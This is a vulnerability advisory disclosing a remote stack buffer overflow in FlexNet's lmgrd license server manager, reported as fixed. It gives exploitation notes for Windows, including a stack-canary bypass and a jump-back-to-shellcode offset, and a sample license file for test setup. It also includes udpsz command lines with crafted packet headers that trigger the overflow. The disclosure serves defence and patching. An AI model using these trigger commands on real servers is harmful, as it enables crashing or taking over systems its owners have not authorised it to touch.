####################################################################### Luigi Auriemma Application: FlexNet License Server Manager http://www.flexerasoftware.com/products/flexnet-publisher.htm http://www.globes.com/support/fnp_utilities_download.htm Versions: <= 11.9.1 and others earlier (this version number was written when I found the advisory many months/years ago) Platforms: AIX, HP-UX, Linux, Mac OSX, Windows, SGI, Solaris Bug: stack overflow in lmgrd Exploitation: remote, versus server Date: found 26 Oct 2010 fixed 26 Mar 2012 advisory 13 May 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== "FlexNet Publisher software licensing makes it easy for software vendors and high-tech manufacturers to manage, secure, enhance, and grow market share through flexible pricing, packaging, licensing, and protection of their software and SaaS offerings." ####################################################################### ====== 2) Bug ====== lmgrd is a license server manager listening on port 27000 and usually running as system service in the products of various vendors like IBM, HP, Sybase, Citrix, VMWare, SolidWorks and so on, it's just the most diffused licenses manager. Exists also another version of the license server called lmadmin that includes a web interface and is NOT vulnerable but it's not diffused as lmgrd. The server is affected by a classical stack buffer-overflow in the function that copies the data received after the header in a buffer smaller than the needeed bytes. On Windows the code execution takes place after the exception in "REP MOVSD" bypassing the "stack canary" protection. For example on this platform [ESP+8] points exactly at the position 0x3718 of our data so we can place a jmp back and executing the shellcode placed before this position. For running the software is needed a license file so for testing the things quickly create the folder c:\flexlm, put lmgrd.exe in it and then create the file license.dat containing the following data and then launch it (I suggest to use -z for launching it in foreground): SERVER this_host ANY VENDOR SYBASE # The Sybase Software Asset Management License Server will not start unless # one valid license is present. The following license is not used but will # allow the License Server to start in the absence of any other licenses. # Once you have generated served licenses for this License Server at SPDC # you should remove this license file. # INCREMENT SYSAM_LICENSE_SERVER SYBASE 2.0 permanent 1 ISSUER="Sybase, \ Inc." ISSUED=14-feb-2007 NOTICE="License to allow the SySAM \ License Server to start in the absence of any other licenses." \ SN=12727 SIGN2="075C 3143 F443 BD70 9869 F180 9AF4 B011 3753 \ A310 510F 6497 6A91 6F8E BD04 11B4 811C B57C 83EB 8F69 F191 \ 499C 2456 5033 B63C 3231 1D5D D269 B7E7 F77A" ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip udpsz -D -T -C "2f 24 189d 4000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0x4000 or the max udpsz -D -T -C "2f b7 1179 ffff 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0xffff note that the 8bit value at offset 1 and the 16bit one at offset 2 are checksums calculated respectively on the 20 bytes header and the rest of the data so they must be set correctly in case of modifications to the packet. ####################################################################### ====== 4) Fix ====== Fixed. #######################################################################